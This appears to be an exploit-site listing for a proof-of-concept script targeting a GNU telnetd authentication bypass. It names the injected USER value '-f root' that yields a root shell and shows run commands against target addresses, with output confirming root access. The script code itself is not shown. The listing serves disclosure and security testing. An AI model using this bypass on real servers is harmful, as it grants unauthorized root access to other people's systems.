## https://sploitus.com/exploit?id=F9F48E6B-06BB-5181-8CDC-86F96F896192
GNU telnetd Authentication Bypass Vulnerability PoC
Vulnerability Type: Authentication Bypass
Affected: GNU telnetd with certain configurations
Description:
This script tests for a vulnerability in GNU telnetd where setting the
USER environment variable to "-f root" can bypass authentication and
obtain a root shell.
Usage:
python3 gnu_telnetd_auth_bypass.py
Example:
python3 gnu_telnetd_auth_bypass.py 192.168.1.100
Author: Security Researcher
License: MIT License
Disclaimer: For authorized security testing and educational purposes only.
https://www.openwall.com/lists/oss-security/2026/01/20/2
```bash
# pip install pexpect
python gnu_telnetd_auth_bypass.py 192.168.1.128
[+] Testing telnetd auth bypass on 192.168.1.128
[+] id output: uid=0(root) gid=0(root) groups=0(root)
[!!!] VULNERABLE: Authentication bypass confirmed (root shell obtained)
python gnu_telnetd_auth_bypass.py -h
usage: gnu_telnetd_auth_bypass.py [-h] [-t SECONDS] [-v] target
GNU telnetd Authentication Bypass Vulnerability PoC
This script tests for a vulnerability in GNU telnetd where setting the
USER environment variable to "-f root" can bypass authentication and
obtain a root shell.
positional arguments:
target Target IP address or hostname
options:
-h, --help show this help message and exit
-t SECONDS, --timeout SECONDS
Connection timeout in seconds (default: 10)
-v, --verbose Enable verbose output
Examples:
gnu_telnetd_auth_bypass.py 192.168.1.100
gnu_telnetd_auth_bypass.py example.com -t 15
```